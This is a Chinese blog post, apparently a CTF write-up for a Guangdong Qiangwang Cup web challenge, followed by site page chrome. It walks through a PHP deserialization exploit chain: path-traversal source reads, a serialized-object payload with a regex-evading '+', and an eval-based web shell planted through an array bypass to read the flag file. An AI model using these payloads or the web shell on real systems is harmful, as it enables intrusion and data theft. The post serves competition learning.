【反序列化】广东省第三界强网杯_API

最新推荐文章于 2024-07-19 14:51:04 发布
最新推荐文章于 2024-07-19 14:51:04 发布
阅读量730 收藏
点赞数
分类专栏: 反序列化 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/119972647
版权

考点:反序列化、json格式

1.根据提示访问api,发现要进行上传filename

2.当post的filename=index.php会提示:sorry,json_decode error!

3.所以post一个json格式的data:filename={"file":"../index.php"},filename={"file":"../hack.php"}可以读到两个php的源代码:

4.代码审计:x参数调用了一个新的hack类,最后会输出x会执行读取文件的函数,读取文件的函数在hack这个类当中,hack类中的文件读取函数readfile()会获取file文件的内容,所以根据这个构造一个序列化函数,来读取fffffaa_not.php,参数为file,序列化结果为:O:4:"hack":1:{s:4:"file";s:15:"fffffaa_not.php";},

5.由于index.php中过滤了o或c开头的字符串,并且过滤了冒号:之后为数字的字符串,所以4前面要添上加号就正则匹配不到,O:+4:"hack":1:{s:4:"file";s:15:"fffffaa_not.php";},然后进行url编码,因为网页解析的时候会进行url解码,但是url编码不会对+进行编码,所以要手动将+转换为%2b

可以使用notepad++,最终的url编码为:O%3A%2b4%3A%22hack%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A15%3A%22fffffaa_not.php%22%3B%7D

6.然后进行访问:

7.得到fffffaa_not.php的源代码

8.进行代码审计:传入两个参数:jhh08881111jn和file_na

由于代码中对传入的&text参数进行了正则过滤,所以传入数组进行绕过。

执行:(空格要改成+)http://10.177.228.174/fffffaa_not.php?jhh08881111jn[]=<?php+@eval($_POST['pass']);?>&file_na=11

9.执行之后访问写入的11.php,post数据发现可以执行

10.但是无法用菜刀连接,原因:页面禁用了许多函数,而用菜刀连接的时候会调用这些函数。

11.所以直接post data进行访问:

先查看根目录的php语句为:pass=print_r(scandir('/'));

所以获取文本内容pass=print_r(file_get_contents('/f1ag_ahajjdhh11qwe'));

malloc_冲!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php writeup,强网杯writeup-web辅助(php反序列化
weixin_29344197的博客
03-29 388
0x00 源码分析index.php,序列化过程@error_reporting(0);require_once "common.php";require_once "class.php";if (isset($_GET['username']) && isset($_GET['password'])){$username = $_GET['username'];$password...
第三广东省强网杯网络安全大赛WEB题writeup
qq_28205153的博客
11-04 4020
1. 小明又被拒绝了 直接访问根目录,报403错误 一般是做了ip限制,加上 X-Forwarded-For 头即可绕过 接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin=0 ,很明显是通过Cookie来判断是否是管理员,直接在请求中加个 Cookie:admin=1 即可绕过,获取flag. 2.XX? 直接访问根目录,发现是个百度页面,看了下源码,没什...
【Reverse】2022 强网杯 game
woodwhale的博客
08-13 459
复现一下强网杯的game
(二)强网杯2019[随便注]
qq_53856457的博客
11-25 2987
堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句。 堆叠注入原理 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 举个堆叠注入攻击的例子 执行查询时,第一个语句执行信息查询,第二个语句则将表user的所有内容给删除了。 mysql> sele..
PHP序列化及反序列化绕过
qq_46041723的博客
11-18 3086
序列化和反序列化及绕过前言序列化和反序列化序列化反序列化反序列化绕过ctf题目实例 前言 本菜鸡本着菜死人不偿命的觉悟,接着迈向了ctf的世。 废话不多说,今天来谈一下PHP的序列化和反序列化还有一些绕过姿势 序列化和反序列化 序列化 在PHP里面存在一个serialize方法来实现序列化功能。 Serializable { /* 方法 */ abstract public serialize ( ) : string abstract public unserialize ( string $seria
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
在处理Java对象与Redis之间的转换时,序列化和反序列化是必不可少的步骤。本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的...
深入理解Java对象的序列化与反序列化的应用
09-05
Java对象的序列化和反序列化是Java编程中重要的概念,尤其在数据持久化和网络通信中发挥着关键作用。本文将深入解析这两个过程以及相关的API。 首先,对象的序列化是将Java对象转换为字节序列的过程,以便能够存储...
C#之JSON序列化和反序列化
05-09
在C#编程中,JSON(JavaScript Object Notation)序列化和反序列化是常见的数据转换技术,用于在应用程序之间交换数据。JSON是一种轻量级、易于读写的数据格式,广泛应用于Web服务和客户端之间的通信。本篇文章将...
Java将对象写入文件读出_序列化与反序列化的实例
08-29
Java对象序列化与反序列化实例 Java对象序列化与反序列化是Java语言中的一种机制,用于将对象转换为字节流,以便于对象的存储和传输。在本篇文章中,我们将通过一个实例,来演示如何使用Java将对象写入文件读出,并...
C#或.net json序列化反序列化,适用于与第三方系统做接口用
05-24
C#或.net json序列化反序列化,适用于与第三方系统做接口用,实体自动转json字符串,json自动转视图
[强网杯 2019]Upload 反序列化结合文件上传
scrawman的博客
12-05 1177
[强网杯 2019]Upload www.tar.gz发现源码,文件还有点大,是把整个工程文件都上传了。 用phpstrom打开的话会有断点提示,一处是在Register.php,另一处是在Index.php,是在提示我们用cookie传序列化字符串。 重点在Profile.php,毕竟文件上传都是在这里控制的,看到两个魔术方法__call和__get。调用本类中没有的方法触发__call,调用this->{$name},如果本类中也没有这个属性,调用__get。 再倒回去看index.php
反序列化强网杯2019—UPLOAD)
kid的博客
05-29 5879
反序列化强网杯2019—UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
2021-07-22ctf2021强网杯wp赌徒反序列化
qq_45290991的博客
07-22 673
文章目录 源代码:分析__invoke__get_tostring EXP调用流程:总结 源代码: <meta charset="utf-8"> <?php //hint is in hint.php error_repo...
2020第四届强网杯-强网先锋-Web辅助 writeup
lnjoy
09-13 1711
2020第四届强网杯,强网先锋的Web辅助详解。 本题考查php反序列化反序列化字符串逃逸,__wakeup()绕过,使用16进制绕过关键字过滤。 题目给了源码,要求传入get参数username和password。 由源码可知,在index.php传入username和password后,会使用这两个参数创建player对象。将player对象序列化,经过write函数处理,最后写入以访问ip的md5为文件名的文件中。 if (isset($_GET['username']) && is
2017强网杯 web 解题思路总结
wkend的博客
04-10 2050
声明:首先这篇博文算不上原创,自己也是一个小白,在这里我主要参考了 这篇博客:https://blog.csdn.net/hardhard123/article/details/79683128 以及这篇writeup:https://www.ichunqiu.com/writeup/detail/503 写这篇博客的主要动机就是一边总结,一边学习,就当做是一篇学习笔记。 首先打开题目...
CTF——web个人总结
热门推荐
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1285
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
Ubuntu 查询未更新的包 进行手动更新
最新发布
小婷
07-19 56
lsb_release -a 查询ubuntu的版本号,我这边是20.04。apt list --upgradable 查询未更新的包。中间遇到输入选择,输入y即可。
PHP小课堂】学习PHP中的字符串操作函数(三)
硬核项目经理
07-15 781
学习PHP中的字符串操作函数(三)继续我们的 PHP 中字符串函数的学习之旅。今天我们要学习的内容是除了 str_ 和 str 开头之外的其它函数,这些函数也有很多非常好玩的内容,让我们赶快进入主题吧。分隔、打断字符串关于这个分割字符串并成为数组,或者是反过来的将数组组合成字符串的功能来说,implode() 和 explode() 这两个函数真的是出镜率非常的高。所以它们的使用也不用我多做介绍了...
Java对象序列化与反序列化详解
"Java对象序列化与反序列化是将Java对象转化为二进制字节流,以便存储或在网络中传输。此过程涉及到Serializable和Externalizable接口,以及ObjectOutputStream和ObjectInputStream类。" 在Java中,对象的序列化是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值